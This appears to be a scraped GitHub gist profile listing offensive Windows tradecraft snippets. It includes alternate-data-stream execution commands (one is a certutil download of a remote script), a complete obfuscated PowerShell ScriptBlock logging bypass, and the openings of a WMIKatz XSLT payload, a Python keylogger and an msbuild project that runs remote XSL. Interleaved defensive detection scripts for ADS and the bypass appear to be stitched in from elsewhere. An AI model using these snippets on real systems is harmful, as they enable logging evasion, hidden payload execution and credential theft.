Adam M Toscher W00t3k

View GitHub Profile
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
@W00t3k
W00t3k / Exe_ADS_Methods.txt
Created June 16, 2018 22:47 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
#Add content to ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
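An added check to go with the list above (my code, not part of the forked api0cradle gist): every one of those commands leaves the payload in a named NTFS stream, and the file's own size, `dir` and most file browsers never show it. The PowerShell function below walks a directory, lists every stream other than the unnamed `:$DATA` stream that every file has, and flags streams that carry a PE header or an executable-looking name above a size threshold. The function name, the `MinBytes` threshold and the extension list are my assumptions; it needs NTFS and PowerShell 5.1 or later.

```powershell
# Added example, not from the api0cradle gist. Enumerate alternate data streams
# under a directory and flag the ones that look like a planted binary or script.
function Find-SuspiciousAds {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,
        # Assumption: anything smaller than this is ignored unless it is a PE image.
        # Legitimate streams such as Zone.Identifier are only tens of bytes.
        [int] $MinBytes = 1024
    )
    # Assumed list of stream-name extensions worth a second look.
    $suspectExt = '.exe', '.dll', '.ps1', '.bat', '.cab', '.reg'

    Get-ChildItem -LiteralPath $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # Every file has the unnamed ':$DATA' stream; anything else is an ADS.
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                ForEach-Object {
                    $stream = $_
                    # Peek at the first two bytes of the stream: 'MZ' marks a PE image.
                    $head = if ($PSVersionTable.PSVersion.Major -ge 6) {
                        Get-Content -LiteralPath $file.FullName -Stream $stream.Stream `
                            -AsByteStream -TotalCount 2 -ErrorAction SilentlyContinue
                    } else {
                        Get-Content -LiteralPath $file.FullName -Stream $stream.Stream `
                            -Encoding Byte -TotalCount 2 -ErrorAction SilentlyContinue
                    }
                    $head = @($head)
                    $isPe = ($head.Count -eq 2 -and $head[0] -eq 0x4D -and $head[1] -eq 0x5A)
                    $ext  = [IO.Path]::GetExtension($stream.Stream)
                    [pscustomobject]@{
                        File       = $file.FullName
                        Stream     = $stream.Stream
                        Bytes      = $stream.Length
                        IsPE       = $isPe
                        Suspicious = $isPe -or ($stream.Length -ge $MinBytes -and $ext -in $suspectExt)
                    }
                }
        }
}

# Usage: Find-SuspiciousAds -Path 'C:\ADS' | Where-Object Suspicious | Format-Table -AutoSize
```

A stream only survives on NTFS: copying the host file to FAT, to most non-Windows shares or into an e-mail drops it, so run this on the volume itself. `dir /R` from cmd lists the same streams if PowerShell is not available.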
@W00t3k
W00t3k / ScriptBlockLogBypass.ps1
Created June 10, 2018 23:55 — forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
# Reaches into the private static cache PowerShell reads its Group Policy
# settings from and switches ScriptBlock logging off for this process only.
# The split identifiers ('ScriptB'+'lockLogging', "GetFie`ld") exist to defeat
# naive string matching on the script block text that gets logged.
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }
}
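An added detection for the bypass above (my code, not from the cobbr gist): the script block that disables ScriptBlock logging is itself written to the Microsoft-Windows-PowerShell/Operational log as event 4104 before the change takes effect, so the telltales are on disk. The backtick and string-concatenation tricks in the gist only break matching on the raw text, so normalise first, then look for the private field name and the setting keys. The function names, the indicator list and the two-hit threshold are my assumptions; the property layout used is that of a 4104 event (ScriptBlockText, ScriptBlockId and Path are the third, fourth and fifth properties).

```powershell
# Added example, not from the cobbr gist. Hunt the ScriptBlock log for the
# logging bypass, undoing its two obfuscation tricks before matching.
function ConvertTo-NormalizedScript {
    param([Parameter(Mandatory)][string] $Text)
    # Strip backticks: "GetFie`ld" becomes "GetField". Legitimate escapes such
    # as `n are mangled too, which does not matter for indicator matching.
    $t = $Text -replace '`', ''
    # Fold adjacent single-quoted literals joined by '+': 'ScriptB'+'lockLogging'
    # becomes 'ScriptBlockLogging'. Loop because 'a'+'b'+'c' needs two passes.
    $pattern = "'([^']*)'\s*\+\s*'([^']*)'"
    do {
        $before = $t
        $t = $t -replace $pattern, "'`$1`$2'"
    } while ($t -ne $before)
    return $t
}

function Find-ScriptBlockLoggingBypass {
    param(
        [string]   $ComputerName = $env:COMPUTERNAME,
        [datetime] $Since = (Get-Date).AddDays(-7)
    )
    # Assumed indicator set: the private field the bypass reads and the
    # settings it zeroes. Two or more hits in one block is the alert threshold.
    $indicators = 'cachedGroupPolicySettings',
                  'EnableScriptBlockLogging',
                  'EnableScriptBlockInvocationLogging',
                  'System.Management.Automation.Utils'

    Get-WinEvent -ComputerName $ComputerName -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $Since
    } | ForEach-Object {
        $ev    = $_
        $block = [string]$ev.Properties[2].Value      # ScriptBlockText
        $norm  = ConvertTo-NormalizedScript -Text $block
        $hits  = @($indicators | Where-Object { $norm -match [regex]::Escape($_) })
        if ($hits.Count -ge 2) {
            [pscustomobject]@{
                TimeCreated   = $ev.TimeCreated
                RecordId      = $ev.RecordId
                ScriptBlockId = $ev.Properties[3].Value
                Path          = $ev.Properties[4].Value
                Indicators    = ($hits -join ',')
            }
        }
    }
}

# Offline check of the normaliser on constructed input shaped like the gist's first line:
$sample = '$f = [ref].Assembly.GetType(''System.Management.Automation.Utils'')."GetFie`ld"(''cachedGroupPolicySettings'', ''N''+''onPublic,Static'')'
ConvertTo-NormalizedScript -Text $sample

# Usage against a live host: Find-ScriptBlockLoggingBypass -Since (Get-Date).AddDays(-1) | Format-List
```

Because the patched cache lives inside one PowerShell process, a new process starts with logging on again; the one block you will not see is whatever ran after the bypass inside that same session, which is why the alert should fire on the bypass block itself rather than waiting for later activity.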
@W00t3k
W00t3k / gist:57e6e44d392800a0a01715ec9e2985a9
Created April 30, 2018 21:51
WMIKatz - Are you afraid
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
<!-- Copyright (c) Microsoft Corporation. All rights reserved. -->
<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
<xsl:strip-space elements="*" />
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
@W00t3k
W00t3k / readme.md
Created April 3, 2018 13:52 — forked from CodeBrauer/mount-image-qcow2-from-kvm-on-macos.md
Mount image (qcow2) from KVM on macOS - fastest way? / Convert qcow2 to access files (EXT4 partition)

If you haven't installed any FUSE yet:

brew tap homebrew/fuse
brew install Caskroom/cask/osxfuse
  1. brew install qemu ext4fuse
  2. qemu-img convert -p -O vmdk snapshot.qcow2 system.vmdk (this will take some time)
  3. Download and register for a free licence of VMDK Mounter for Mac® OS X and install it.
  4. Reboot your macOS device.
@W00t3k
W00t3k / keylogger.py
Created March 31, 2018 13:19 — forked from xorrior/keylogger.py
Python on disk keylogger
import zipfile
import io
import sys
import os, imp
import base64
import threading
moduleRepo = {}
_meta_cache = {}
@W00t3k
W00t3k / all.txt
Created March 19, 2018 14:40 — forked from jhaddix/all.txt
all wordlists for every dns enumeration tool... ever.
@
*
0
00
0-0
000
0000
00000
000000
@W00t3k
W00t3k / SUID
Created March 18, 2018 03:17
SUID LU
Russell Cohen
March 13, 2018
Sudo Science: A brief tour of how Unix enables regular users to gain super (user) powers
Somehow I made it this far without actually understanding how sudo works. For years, I've just typed sudo, typed my password, and revelled in my new, magical, root super powers. The other day I finally looked into it – to be honest, the mechanism is not at all what I expected. After going through the basics, we'll walk through creating our own version of sudo.
How Sudo Works
sudo is just a regular old program that essentially does 3 things:
@W00t3k
W00t3k / xslt.proj
Created March 6, 2018 11:49
msbuild XSLT Execute From URL
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<Target Name="Example">
<ItemGroup>
<XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
</ItemGroup>
<PropertyGroup>
<XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
</PropertyGroup>
<XslTransformation
OutputPaths="output.%(XmlFiles.FileName).html"